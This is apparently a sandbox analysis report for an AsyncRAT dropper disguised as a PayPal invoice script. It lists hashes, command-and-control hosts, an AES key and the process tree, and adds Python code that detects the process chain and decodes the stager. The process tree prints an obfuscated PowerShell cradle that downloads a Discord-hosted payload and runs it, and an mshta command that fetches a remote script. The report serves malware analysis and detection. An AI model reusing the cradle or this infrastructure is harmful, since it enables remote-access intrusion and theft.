Analysis

max time kernel    119s
max time network   151s
platform           windows7_x64
resource           win7v20210410
submitted          18-04-2021 13:31

Static task        static1
Behavioral task    behavioral1
Sample             invoice-order-21412-paypal.xlxs.vbs
Resource           win7v20210410
General

Target  invoice-order-21412-paypal.xlxs.vbs
Size    162B
MD5     af9312989a85c937bf50226288f659ab
SHA1    ecb5925f60c91a7926579f086642c3f193fa1e64
SHA256  fda270ad50aed906730605ca93ecaa3e24792dd070bb443f94d2d6c23124ad61
SHA512  113a7dace186edcec5862f4d5fa75cab31ff096c51fac88549e42656eaba60a09660a2115579fc7aab8142b6c6bb65b0342486a522e161f598a103b2167d3413
Malware Config

Extracted
https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt

Extracted
Family   asyncrat
Version  0.5.7B
C2       :6606
         :7707
         :8808
         usa-man.accesscam.org:6606
         usa-man.accesscam.org:7707
         usa-man.accesscam.org:8808
         xaft.camdvr.org:6606
         xaft.camdvr.org:7707
         xaft.camdvr.org:8808
         goodpc.theworkpc.com:6606
         goodpc.theworkpc.com:7707
         goodpc.theworkpc.com:8808
         (the three host-less entries come from the leading comma in the host field below: every host, including the empty one, is paired with every port)
Mutex    AsyncMutex_6SI8OkPnk

Attributes
aes_key          9sb1l01wZwOFyWz3WpY3G9vMmrO3T3j5
anti_detection   false
autorun          false
bdos             false
delay            Default
host             ,usa-man.accesscam.org,xaft.camdvr.org,goodpc.theworkpc.com
hwid             3
install_file     (empty)
install_folder   %AppData%
mutex            AsyncMutex_6SI8OkPnk
pastebin_config  null
port             6606,7707,8808
version          0.5.7B
Signatures

Async RAT payload (5 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/1420-73-0x0000000000400000-0x0000000000412000-memory.dmp   asyncrat
  behavioral1/memory/1420-74-0x000000000040C79E-mapping.dmp                    asyncrat
  behavioral1/memory/1420-76-0x0000000000400000-0x0000000000412000-memory.dmp   asyncrat
  behavioral1/memory/1420-81-0x0000000004130000-0x000000000414D000-memory.dmp   asyncrat
  behavioral1/memory/1420-82-0x0000000005400000-0x0000000005440000-memory.dmp   asyncrat

Blocklisted process makes network request (5 IoCs)
  flow  pid   process
  7     1176  mshta.exe
  9     1176  mshta.exe
  10    632   powershell.exe
  12    632   powershell.exe
  14    632   powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  description                         pid  process         target process
  PID 632 set thread context of 1420  632  powershell.exe  aspnet_compiler.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings (1 IoC)
  description  ioc                                                                                                     process
  Key created  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   process
  632   powershell.exe
  632   powershell.exe
  1420  aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  632   powershell.exe
  Token: SeDebugPrivilege  1420  aspnet_compiler.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  description                       pid   process         target process       entries
  PID 1104 wrote to memory of 1176  1104  WScript.exe     mshta.exe            3
  PID 1176 wrote to memory of 632   1176  mshta.exe       powershell.exe       3
  PID 632 wrote to memory of 1420   632   powershell.exe  aspnet_compiler.exe  9
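The WriteProcessMemory and SetThreadContext entries above describe one chain, WScript.exe -> mshta.exe -> powershell.exe -> aspnet_compiler.exe, with powershell.exe writing into aspnet_compiler.exe and redirecting one of its threads, which is what a hollowed host process looks like from the outside. The Python below is an added example, not anything from this report: it runs a few process-chain rules over constructed process-creation records in a Sysmon Event ID 1 style (the field names are this example's own). The PIDs, images and command lines of the four malicious processes are copied from the report's process tree; the explorer.exe parent with PID 600 and the benign PowerShell with PID 2000 are invented controls. Treating .NET Framework binaries other than aspnet_compiler.exe as hollowing hosts is an assumption beyond this report.

```python
"""Process-chain detection for the WScript -> mshta -> powershell -> aspnet_compiler
pattern. Added example, not code from the report. EVENTS are constructed
Sysmon Event ID 1-style records: the four malicious processes use the report's
PIDs/images/command lines; explorer.exe (600) and the benign PowerShell (2000)
are invented controls."""
import re

EVENTS = [
    {"pid": 600, "ppid": 0, "image": r"C:\Windows\explorer.exe",          # constructed parent
     "cmd": r"C:\Windows\explorer.exe"},
    {"pid": 1104, "ppid": 600, "image": r"C:\Windows\System32\WScript.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-order-21412-paypal.xlxs.vbs"'},
    {"pid": 1176, "ppid": 1104, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/833265385779494912/833265576608530492/Encoding.txt'},
    {"pid": 632, "ppid": 1176, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X'''},
    {"pid": 1420, "ppid": 632, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmd": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"},
    {"pid": 2000, "ppid": 600, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},   # constructed benign control
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# aspnet_compiler.exe is the host seen in this report; the others are .NET
# Framework binaries commonly abused the same way (assumption, not from the report).
HOLLOW_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize_ps(cmd):
    # A backtick before an ordinary character is a no-op escape in PowerShell,
    # so I`E`X is IEX; strip them so keyword matching sees the real token.
    return cmd.replace("`", "").lower()


def ancestors(event, by_pid):
    """Image names of parent, grandparent, ... (cycle-safe)."""
    chain, seen, cur = [], set(), event
    while cur["ppid"] in by_pid and cur["pid"] not in seen:
        seen.add(cur["pid"])
        cur = by_pid[cur["ppid"]]
        chain.append(basename(cur["image"]))
    return chain


def detect(events):
    """Return (rule, pid) findings for the given process-creation records."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        chain = ancestors(e, by_pid)
        parent = chain[0] if chain else None
        if name == "mshta.exe" and re.search(r"https?://", e["cmd"], re.I):
            findings.append(("mshta_remote_url", e["pid"]))
        if name == "powershell.exe":
            ps = normalize_ps(e["cmd"])
            if parent in SCRIPT_HOSTS:
                findings.append(("powershell_from_script_host", e["pid"]))
            # 'downloadstring' never appears literally in this stager; the IEX
            # token (once unescaped) and the pile of .Replace() calls do.
            if re.search(r"\b(iex|invoke-expression|downloadstring)\b", ps) or ps.count(".replace(") >= 2:
                findings.append(("powershell_download_cradle", e["pid"]))
        if name in HOLLOW_HOSTS and parent == "powershell.exe":
            findings.append(("dotnet_host_spawned_by_powershell", e["pid"]))
            if SCRIPT_HOSTS & set(chain):
                findings.append(("script_host_powershell_dotnet_chain", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40s} pid={pid}")
```

Process-creation events alone cannot show the WriteProcessMemory/SetThreadContext activity the sandbox recorded; the last rule stands in for it by flagging a .NET binary whose lineage runs through powershell.exe back to a script host, which is the shape of this sample's chain.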
Processes

[1] C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-order-21412-paypal.xlxs.vbs"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/833265385779494912/833265576608530492/Encoding.txt
      - Blocklisted process makes network request
      - Modifies Internet Explorer settings
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        - Blocklisted process makes network request
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          #cmd
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
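The powershell.exe command line above assembles its download cradle from .Replace() calls and backtick-split IEX so that neither "DownloadString" nor "IEX" appears literally. The Python below is an added example, not code from the report: it replays those string operations statically to recover what actually runs. It parses the $var='literal'.Replace(a,b) assignments with a regular expression, applies them as .NET String.Replace does (every occurrence, case-sensitive), joins $t1 and $t2 as -Join '' does, and expands the variables the way the first Invoke-Expression would when it evaluates the joined text as code. The STAGER string is the command line copied from the process tree; the regexes and the re-quoting of the expanded URL are this example's own choices.

```python
"""Static replay of the string assembly in the PowerShell stager from this
report's process tree. Added example, not code from the report. Parses the
$var='literal'.Replace(a,b) assignments, applies them as .NET String.Replace
does (all occurrences, case-sensitive), joins $t1,$t2 as -Join '' does, and
expands the variables as the first IEX would when it runs the joined text as
code. Regexes and the quoting of the expanded URL are this example's own."""
import re

# Stager copied from the report's powershell.exe command line.
STAGER = (
    r"$A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');"
    r"$d='tnt'.Replace('tn','Ne');"
    r"$link ='https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt';"
    r"$t1='(New-OS'.Replace('S','bje');"
    r"$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');"
    r"$WC=I`E`X ($t1,$t2 -Join '')|I`E`X"
)

ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'((?:\.Replace\('[^']*','[^']*'\))*)")
REPLACE = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")
JOIN = re.compile(r"\(((?:\$\w+,)*\$\w+) -Join ''\)")


def resolve_assignments(script):
    """Evaluate every $name='...'.Replace(...) chain to its final string."""
    values = {}
    for name, literal, chain in ASSIGN.findall(script):
        value = literal                      # single-quoted: no $var expansion yet
        for old, new in REPLACE.findall(chain):
            value = value.replace(old, new)  # .NET Replace: all occurrences
        values[name] = value
    return values


def expand(text, values):
    """Expand $vars as IEX does when it runs the text as code. A value that is
    a URL is re-quoted so the result stays valid PowerShell."""
    def sub(m):
        v = values[m.group(1)]
        return f"'{v}'" if "://" in v else v
    return re.sub(r"\$(\w+)", sub, text)


def deobfuscate(script=STAGER):
    values = resolve_assignments(script)
    parts = [p.lstrip("$") for p in JOIN.search(script).group(1).split(",")]
    joined = "".join(values[p] for p in parts)
    outer = script.rsplit(";", 1)[-1].replace("`", "")   # I`E`X -> IEX
    return {"vars": values, "joined": joined,
            "command": expand(joined, values), "outer": outer}


if __name__ == "__main__":
    r = deobfuscate()
    print(r["outer"])    # $WC=IEX ($t1,$t2 -Join '')|IEX
    print(r["command"])  # what the first IEX executes; its output feeds the second IEX
```

The recovered command is (New-Object System.Net.WebClient).Downloadstring('...Kaspersky.txt'), run by the first IEX; the text it fetches is piped straight into the second IEX, so the next stage never touches disk, which matches the report showing the AsyncRAT payload only in the memory of the hollowed aspnet_compiler.exe.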
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5     f0e4d34ed76525d8f9e4d7330493870d
SHA1    e269bbae066db1e3d4d168ef7b39406fe84c2ae1
SHA256  6bcd573ce6d631dc7f8444d9a7d395a8e7f9fd74ecaafa40867d31a91ffb146c
SHA512  d1e55d8ac5ee0fb9340ec80df996ae4069803f87c65c5fb82e54dff293983d0b129b3e40f78e3bfd12bc5a07f9cf9771abe8748cb1064f6b362ea192108fdc18

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (same path, later capture with different content)
MD5     6e30e0bef3ff5acf5c4b5429314584bf
SHA1    c2641c710c9f6190786ed73f82b7b5969258e31f
SHA256  5895df6209b2df04b8ade3c38a7556923614ac2ead4980328263820fdca8edcf
SHA512  cf08a60bda5f6b2301c412716dac6b75bc681f52b1cb5d65b65cfb8a978cab3ae652a5ff993cb8ffa5047fd94547904b61d5709cfd503f4e5c438964bb8fb660
memory/632-70-0x000000001B600000-0x000000001B601000-memory.dmp   Filesize 4KB
memory/632-61-0x0000000000000000-mapping.dmp
memory/632-64-0x000000001AC50000-0x000000001AC51000-memory.dmp   Filesize 4KB
memory/632-65-0x00000000023D0000-0x00000000023D1000-memory.dmp   Filesize 4KB
memory/632-66-0x0000000002330000-0x0000000002331000-memory.dmp   Filesize 4KB
memory/632-67-0x000000001ABD0000-0x000000001ABD2000-memory.dmp   Filesize 8KB
memory/632-68-0x000000001ABD4000-0x000000001ABD6000-memory.dmp   Filesize 8KB
memory/632-69-0x000000001C4F0000-0x000000001C4F1000-memory.dmp   Filesize 4KB
memory/632-75-0x0000000002670000-0x0000000002671000-memory.dmp   Filesize 4KB
memory/632-63-0x0000000002260000-0x0000000002261000-memory.dmp   Filesize 4KB
memory/632-72-0x0000000002560000-0x000000000257F000-memory.dmp   Filesize 124KB
memory/1104-59-0x000007FEFC4D1000-0x000007FEFC4D3000-memory.dmp  Filesize 8KB
memory/1176-60-0x0000000000000000-mapping.dmp
memory/1420-73-0x0000000000400000-0x0000000000412000-memory.dmp  Filesize 72KB
memory/1420-74-0x000000000040C79E-mapping.dmp
memory/1420-76-0x0000000000400000-0x0000000000412000-memory.dmp  Filesize 72KB
memory/1420-78-0x0000000076E11000-0x0000000076E13000-memory.dmp  Filesize 8KB
memory/1420-79-0x0000000004C00000-0x0000000004C01000-memory.dmp  Filesize 4KB
memory/1420-81-0x0000000004130000-0x000000000414D000-memory.dmp  Filesize 116KB
memory/1420-82-0x0000000005400000-0x0000000005440000-memory.dmp  Filesize 256KB